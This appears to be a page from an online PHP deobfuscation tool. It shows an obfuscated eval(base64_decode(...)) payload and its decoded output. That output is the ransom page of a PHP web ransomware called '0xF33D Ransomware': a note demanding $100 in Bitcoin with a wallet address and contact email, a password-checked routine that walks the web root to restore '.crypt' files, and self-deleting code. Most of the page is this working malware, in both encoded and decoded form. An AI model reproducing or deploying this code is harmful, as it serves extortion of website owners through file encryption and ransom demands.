Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval('?>'.base64_decode('PHRpdGxlPjB4RjMzRCBSYW5zb213YXJlPC90aXRsZT4KPGxpbmsgcmVsPSJ..

Decoded Output download

?>b'<title>0xF33D Ransomware</title>
<link rel="shortcut icon" type="image/x-icon" href="https://img.deusm.com/darkreading/bh-asia-facebook-profile.png">
<style>
html {
background: black;
color: white;
}
input { background: transparent; color: white; border: 1px solid white; }
</style>
<?php
error_reporting(0);
$input = $_POST[\'pass\'];
$pass = "659e6447592d689a21a59a16ec4f23e9";
if(isset($input)) {
if(md5($input) == $pass) {
function decfile($filename){
	if (strpos($filename, \'.crypt\') === FALSE) {
	return;
	}
	$decrypted = gzinflate(file_get_contents($filename));
	file_put_contents(str_replace(\'.crypt\', \'\', $filename), $decrypted);
	unlink(\'crypt.php\');
	unlink(\'.htaccess\');
	unlink($filename);
	echo "$filename Decrypted !!!<br>";
}

function decdir($dir){
	$files = array_diff(scandir($dir), array(\'.\', \'..\'));
		foreach($files as $file) {
			if(is_dir($dir."/".$file)){
				decdir($dir."/".$file);
			}else {
				decfile($dir."/".$file);
		}
	}
}

decdir($_SERVER[\'DOCUMENT_ROOT\']);
echo "<br>Webroot Decrypted<br>";
unlink($_SERVER[\'PHP_SELF\']);
unlink(\'.htaccess\');
copy(\'htabackup\',\'.htaccess\');
echo \'Success !!!\';
} else {
echo \'Failed Password !!!\';
}
exit();
}
?>
<center>
<h1>0xF33D Ransomware</h1>
<img height="200" src="https://i.screenshot.net/k4z06un"/>
<br><br>
<h3>Your Website Is Encrypted</h3>


Don\'t Change the Filename because it Can Damage the File If You Want to Return You Must Enter the Password First
<br>
Send Me $100 For Back Your Website <br><br>
Bitcoin Address : <input type="text" value="1J2rKWJq6NVwVdhFU7w3xKxUeUtx7xadh1" readonly>
<br><br>
<form enctype="multipart/form-data" method="post">
<input type="text" name="pass" placeholder="Password"> <input type="submit" value="Decrypt">
</form>
<br>Contact Mail : [email protected]'<?php

Did this file decode correctly?

Original Code

<?php eval('?>'.base64_decode('PHRpdGxlPjB4RjMzRCBSYW5zb213YXJlPC90aXRsZT4KPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiB0eXBlPSJpbWFnZS94LWljb24iIGhyZWY9Imh0dHBzOi8vaW1nLmRldXNtLmNvbS9kYXJrcmVhZGluZy9iaC1hc2lhLWZhY2Vib29rLXByb2ZpbGUucG5nIj4KPHN0eWxlPgpodG1sIHsKYmFja2dyb3VuZDogYmxhY2s7CmNvbG9yOiB3aGl0ZTsKfQppbnB1dCB7IGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OyBjb2xvcjogd2hpdGU7IGJvcmRlcjogMXB4IHNvbGlkIHdoaXRlOyB9Cjwvc3R5bGU+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKJGlucHV0ID0gJF9QT1NUWydwYXNzJ107CiRwYXNzID0gIjY1OWU2NDQ3NTkyZDY4OWEyMWE1OWExNmVjNGYyM2U5IjsKaWYoaXNzZXQoJGlucHV0KSkgewppZihtZDUoJGlucHV0KSA9PSAkcGFzcykgewpmdW5jdGlvbiBkZWNmaWxlKCRmaWxlbmFtZSl7CglpZiAoc3RycG9zKCRmaWxlbmFtZSwgJy5jcnlwdCcpID09PSBGQUxTRSkgewoJcmV0dXJuOwoJfQoJJGRlY3J5cHRlZCA9IGd6aW5mbGF0ZShmaWxlX2dldF9jb250ZW50cygkZmlsZW5hbWUpKTsKCWZpbGVfcHV0X2NvbnRlbnRzKHN0cl9yZXBsYWNlKCcuY3J5cHQnLCAnJywgJGZpbGVuYW1lKSwgJGRlY3J5cHRlZCk7Cgl1bmxpbmsoJ2NyeXB0LnBocCcpOwoJdW5saW5rKCcuaHRhY2Nlc3MnKTsKCXVubGluaygkZmlsZW5hbWUpOwoJZWNobyAiJGZpbGVuYW1lIERlY3J5cHRlZCAhISE8YnI+IjsKfQoKZnVuY3Rpb24gZGVjZGlyKCRkaXIpewoJJGZpbGVzID0gYXJyYXlfZGlmZihzY2FuZGlyKCRkaXIpLCBhcnJheSgnLicsICcuLicpKTsKCQlmb3JlYWNoKCRmaWxlcyBhcyAkZmlsZSkgewoJCQlpZihpc19kaXIoJGRpci4iLyIuJGZpbGUpKXsKCQkJCWRlY2RpcigkZGlyLiIvIi4kZmlsZSk7CgkJCX1lbHNlIHsKCQkJCWRlY2ZpbGUoJGRpci4iLyIuJGZpbGUpOwoJCX0KCX0KfQoKZGVjZGlyKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10pOwplY2hvICI8YnI+V2Vicm9vdCBEZWNyeXB0ZWQ8YnI+IjsKdW5saW5rKCRfU0VSVkVSWydQSFBfU0VMRiddKTsKdW5saW5rKCcuaHRhY2Nlc3MnKTsKY29weSgnaHRhYmFja3VwJywnLmh0YWNjZXNzJyk7CmVjaG8gJ1N1Y2Nlc3MgISEhJzsKfSBlbHNlIHsKZWNobyAnRmFpbGVkIFBhc3N3b3JkICEhISc7Cn0KZXhpdCgpOwp9Cj8+CjxjZW50ZXI+CjxoMT4weEYzM0QgUmFuc29td2FyZTwvaDE+CjxpbWcgaGVpZ2h0PSIyMDAiIHNyYz0iaHR0cHM6Ly9pLnNjcmVlbnNob3QubmV0L2s0ejA2dW4iLz4KPGJyPjxicj4KPGgzPllvdXIgV2Vic2l0ZSBJcyBFbmNyeXB0ZWQ8L2gzPgoKCkRvbid0IENoYW5nZSB0aGUgRmlsZW5hbWUgYmVjYXVzZSBpdCBDYW4gRGFtYWdlIHRoZSBGaWxlIElmIFlvdSBXYW50IHRvIFJldHVybiBZb3UgTXVzdCBFbnRlciB0aGUgUGFzc3dvcmQgRmlyc3QKPGJyPgpTZW5kIE1lICQxMDAgRm9yIEJhY2sgWW91ciBXZWJzaXRlIDxicj48YnI+CkJpdGNvaW4gQWRkcmVzcyA6IDxpbnB1dCB0eXBlPSJ0ZXh0IiB2YWx1ZT0iMUoycktXSnE2TlZ3VmRoRlU3dzN4S3hVZVV0eDd4YWRoMSIgcmVhZG9ubHk+Cjxicj48YnI+Cjxmb3JtIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0icG9zdCI+CjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwYXNzIiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiPiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRGVjcnlwdCI+CjwvZm9ybT4KPGJyPkNvbnRhY3QgTWFpbCA6IGQ0cnBhQHByb3Rvbm1haWwuY29t').'<?php '); ?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 f187160b27882b96c1bdad5e1372af04
Eval Count 1
Decode Time 91 ms